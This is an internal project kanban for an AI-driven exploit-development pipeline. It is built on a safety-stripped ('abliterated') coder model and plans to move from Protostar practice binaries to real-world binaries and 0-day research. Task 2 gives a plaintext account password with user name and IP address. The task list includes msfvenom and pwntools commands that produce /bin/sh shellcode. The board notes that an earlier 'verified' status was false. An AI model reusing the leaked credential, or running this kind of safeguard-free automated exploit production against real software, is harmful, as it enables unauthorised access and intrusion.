12 KiB
GreySec RED — Master Kanban
Product: GreySec Exploit Development Pipeline
Type: Internal Build Project
Status: BUILDING
Updated: 2026-05-07
Parent debrief: ~/greysec/ops/debriefs/exploit-lab-2026-05-07.md
Background
GreySec RED is an AI-augmented reverse engineering and exploit development lab. It takes a binary target, runs it through a two-agent pipeline (RE Agent + Exploit Writer), and produces a complete vulnerability brief plus a working exploit.
Architecture:
Binary Target → RE Agent (Kali + qwen2.5-coder:abliterator)
↓
analysis.md + struct.json
↓
Exploit Writer (Kali + qwen2.5-coder:abliterator)
↓
exploit.py + shellcode.bin + test-results.md
Current status: PARTIALLY OPERATIONAL. Works on easy binaries (stack0, stack1, format0). Fails silently on harder ones (heap0). Validation layer missing.
Pipeline Definition
What the product IS: Drop a binary. Get a vulnerability brief, a working exploit, and shellcode. No manual RE required.
What the client receives:
analysis.md— full vulnerability analysis: vulnerable function, offset calculation, attack vector, constraintsstruct.json— structured vulnerability data: offset, return address, bad chars, suggested shellcode typeexploit.py— working pwntools exploit targeting the binary directlyshellcode.bin— position-independent shellcode for the target architecturetest-results.md— proof the exploit was run against the real binary and worked
Target buyer:
- Security teams building internal red team toolchains
- Exploit developers who need fast turnaround on binary targets
- CTF players and competitive hacking teams needing rapid challenge solutions
- Security researchers analyzing third-party binaries for CVEs
Current State
What Works
- RE Agent on stack0, stack1, format0: analysis.md + struct.json correct, exploit.py written and correct
- Agent scripts functional:
re-agent.shandexploit-writer.shexist and execute - Directory structure clean: reports/, exploits/, agents/ properly organized
- Model access confirmed: Kali container can reach MacBook Ollama at 100.127.137.64 (when SSH works)
- Exploit approach correct: pwntools process/stdin for stack0, argv for stack1
What Is Broken or Missing
| # | Issue | Severity | Fix Time | Status |
|---|---|---|---|---|
| 1 | re-agent.sh has no validation gate — if struct.json not produced, exploit-writer.sh runs blind |
CRITICAL | 30 min | Script updated — needs testing |
| 2 | exploit-writer.sh has no test loop — exploit.py never run against real binary |
CRITICAL | 30 min | Script updated — needs testing |
| 3 | No gbrain logging hooks — pipeline findings not captured to institutional knowledge | HIGH | 15 min | Script updated — needs testing |
| 4 | No TIME-LOG hook — ~2.5 hours of AI time completely untracked | HIGH | 15 min | Script updated — needs testing |
| 5 | heap0 RE Agent failed silently — no struct.json, exploit written from guesswork | HIGH | 20 min | Needs re-run with fixed re-agent.sh |
| 6 | No shellcode.bin produced for any binary — referenced in scripts, never built | MEDIUM | 30 min | Needs msfvenom or pwntools asm step |
| 7 | MacBook SSH blocked — password rejected twice — abliterator model unreachable | CRITICAL | TBD | Adam needs to fix SSH or Tailscale |
| 8 | No test-results.md for any binary — "verified" in kanban was false | HIGH | — | Fixes #1 and #2 address this |
| 9 | Skill file greysec-exploit-lab does not exist |
MEDIUM | 1 hour | Needs writing |
| 10 | exploit.py for vuln_test uses nonstandard "launcher" approach |
MEDIUM | 30 min | Needs rewrite as direct pwntools exploit |
BOARD
BACKLOG
- Write
greysec-exploit-labskill (standalone operational procedure) - Build shellcode.bin generation step (msfvenom or pwntools asm) for each binary
- Rewrite vuln_test exploit.py as direct pwntools targeting, not C tempfile launcher
- Add gbrain knowledge logging for each completed target (pipeline should auto-log findings)
- Benchmark: how fast is the pipeline on intermediate binaries (heap2/3, format1-4, net0-4)?
- Windows DLL analysis path — can the pipeline handle PE/DLL analysis?
- ARM/IoT binary path — what changes needed for non-x86 targets?
- Multi-arch support: x86, x64, ARM, MIPS — shellcode generation per arch
IN PROGRESS
- Validate updated re-agent.sh and exploit-writer.sh on heap0
- Unblock MacBook SSH (Adam's decision needed)
VALIDATING
(empty — waiting for heap0 re-run and MacBook SSH fix)
DONE
- Agent pipeline architecture (RE Agent + Exploit Writer, two-stage)
- Agent scripts written (re-agent.sh, exploit-writer.sh)
- Directory structure created (reports/, exploits/, agents/)
- Protostar binaries validated: stack0, stack1, format0 (3 of 5 complete)
- Agent scripts updated with validation gates, gbrain hooks, TIME-LOG hooks
BLOCKED
- MacBook SSH — abliterator model unreachable, all RE runs on cloud fallback
- heap0 re-run — blocked by MacBook SSH (RE Agent works better with abliterator model)
Technical Fix Tasks
Task 1: Validate re-agent.sh + exploit-writer.sh on heap0 (HIGH PRIORITY)
What: The updated scripts have validation gates and test loops. Run them against heap0 to confirm they work.
Test procedure:
cd ~/greysec/engagements/exploit-lab
./agents/re-agent.sh heap0 /opt/protostar/bin/heap0
# Expected: analysis.md + struct.json produced
# Expected: FAIL and exit 1 if struct.json missing
./agents/exploit-writer.sh heap0
# Expected: exploit.py written
# Expected: exploit.py run against real binary
# Expected: test-results.md with PASS or FAIL
Acceptance criteria:
- re-agent.sh exits 1 if struct.json not produced
- exploit-writer.sh refuses to run if struct.json missing
- exploit.py is run and result captured in test-results.md
- Both scripts log to gbrain and TIME-LOG
Who: qwen2.5-coder:14b (can be self-verified) Time: 20-30 minutes
Task 2: Fix MacBook SSH Access (CRITICAL — Adam's Decision Needed)
What: Password SSH to adamsloggett@100.127.137.64 rejected twice. The abliterator model only lives on MacBook.
Option A — Fix the password:
The current Mac password is V4sTGRZqm#dW5@aW (rotated 2026-05-05). Try from the Linux host directly to confirm whether this is a Tailscale SSH issue or a password issue:
ssh adamsloggett@100.127.137.64
# from the Linux host — not through Tailscale if possible
Option B — Use Tailscale SSH instead:
Tailscale SSH (ssh -h tailscale adamsloggett@100.127.137.64) bypasses password auth using Tailscale's SSH certificate authority. This requires:
# On the Mac: enable Tailscale SSH
tailscale set --ssh
# On the Linux host: use Tailscale hostname
ssh adamsloggett@macbook-pro-2
# Or: ssh adamsloggett@100.127.137.64 -o "ProxyCommand tailscale ssh --bg %h"
Option C — Copy the abliterator model to Linux:
If MacBook is unreachable, pull huihui_ai/qwen2.5-coder-abliterate:latest from MacBook's Ollama and host it on Linux. This requires enough disk space (~10GB).
Who: Adam needs to pick an option and act. Hermes will execute once the path is confirmed. Time: Option A or B: ~15 minutes. Option C: ~30 minutes.
Task 3: Re-Run heap0 with Fixed Scripts
What: heap0's RE Agent failed silently in the original run. With the validation gate in place, re-run it.
Procedure:
cd ~/greysec/engagements/exploit-lab
./agents/re-agent.sh heap0 /opt/protostar/bin/heap0
# Should produce struct.json or FAIL
./agents/exploit-writer.sh heap0
# Should produce tested exploit.py
Acceptance criteria:
- struct.json produced for heap0
- analysis.md accurate (verify offset and WINNER address)
- exploit.py written and tested — PASS in test-results.md
Who: qwen2.5-coder:14b Time: 20-30 minutes
Task 4: Shellcode Generation Step
What: No shellcode.bin has ever been produced. The agent scripts reference it but the step doesn't exist.
Approach: Use msfvenom or pwntools' asm() to generate shellcode based on the binary architecture.
For Protostar binaries (x86, static):
# Example for stack0 (calls execve("/bin/sh"))
msfvenom -p linux/x86/exec CMD=/bin/sh -f raw -a x86 --platform linux
Or via pwntools in exploit.py:
from pwn import *
shellcode = asm(shellcraft.i386.linux.sh())
Files to touch: exploit-writer.sh — add shellcode generation as a post-exploit step.
Who: qwen2.5-coder:14b Time: 30 minutes to add the step and test on stack0
Task 5: Rewrite vuln_test exploit.py (MEDIUM)
What: The current vuln_test exploit.py uses a nonstandard "launcher" approach (compiles a C helper program inside a Python tempfile). Rewrite it as a direct pwntools process targeting the actual /tmp/vuln_test binary.
Why: The agent contract specifies pwntools process/exploit targeting the binary directly. The launcher approach is a workaround that suggests the model didn't fully understand how to exploit the binary via pwntools standard interface.
Who: qwen2.5-coder:14b Time: 30 minutes
Capability Expansion Tasks
Tier 1: Beginner (WHAT EXISTS)
Binaries: stack0, stack1, format0 (Protostar) Skills needed: Basic buffer overflow, format string exploitation Time per binary: ~20-30 minutes with pipeline Status: OPERATIONAL — 3 of 3 complete
Tier 2: Intermediate (IN BACKLOG)
Binaries: heap2, heap3, format1-4, net0-4 (Protostar) Skills needed: Heap grooming, UAF, fastbin dup, format string chaining Time per binary: ~40-60 minutes with pipeline What needs building: None — same pipeline, harder targets
Tier 3: Advanced (IN BACKLOG)
Binaries: Fusion (Web, HTTP, SQL, etc. — advanced Protostar) Skills needed: ROP chains, ASLR/DEP bypass, heaptechniques What needs building: ROP gadget finder integration, libc database lookup Time per binary: ~60-90 minutes with pipeline
Tier 4: Elite (FUTURE)
Targets: Real-world binaries, DLL analysis, kernel modules Skills needed: Full RE, CVE research, kernel exploitation What needs building: Windows VM path, DLL analysis pipeline, kernel debug setup
Product Tiers (Internal Planning)
| Tier | Target | Output | Complexity | Time |
|---|---|---|---|---|
| Beginner | stack/heap/format (Protostar) | analysis + exploit | Easy | 20-30 min |
| Intermediate | Protostar advanced, VWA | analysis + exploit + ROP | Medium | 40-60 min |
| Advanced | real-world binaries | analysis + struct.json + suggested exploit path | Hard | 60-120 min |
| Elite | 0-day research | analysis only (no exploit — model limitations) | Expert | TBD |
Definition of Done
GreySec RED is operational when:
- re-agent.sh validates struct.json and exits non-zero if missing
- exploit-writer.sh tests exploit.py against real binary and reports PASS/FAIL
- gbrain logging is wired and firing after each completed target
- TIME-LOG is updated after each pipeline run
- heap0 re-run produces correct struct.json (validated against known values: offset 80, WINNER 0x08048464)
- shellcode.bin is generated for at least stack0
- All 5 Protostar binaries (stack0, stack1, format0, heap0, vuln_test) have PASS in test-results.md
- MacBook SSH is unblocked and abliterator model is reachable
- Skill file
greysec-exploit-labexists and documents operational procedure - At least one intermediate binary (heap2 or format1) has been processed end-to-end and PASS
DEBT (Action Items from This Kanban)
| Action Item | Priority | Status | Notes |
|---|---|---|---|
| Validate updated scripts on heap0 | CRITICAL | open | Confirm validation gates work |
| Unblock MacBook SSH | CRITICAL | blocked | Adam's decision needed |
| Re-run heap0 with fixed scripts | HIGH | open | After Task 1 |
| Build shellcode.bin generation step | HIGH | open | msfvenom or pwntools asm |
| Rewrite vuln_test exploit.py | MEDIUM | open | Direct pwntools approach |
| Test intermediate binaries (heap2, format1) | MEDIUM | open | Pipeline validation |
| Write greysec-exploit-lab skill | MEDIUM | open | Operational docs |
| Add ROP gadget finder for advanced tier | LOW | backlog | Future |
| Validate pipeline against Windows DLL | LOW | backlog | Future |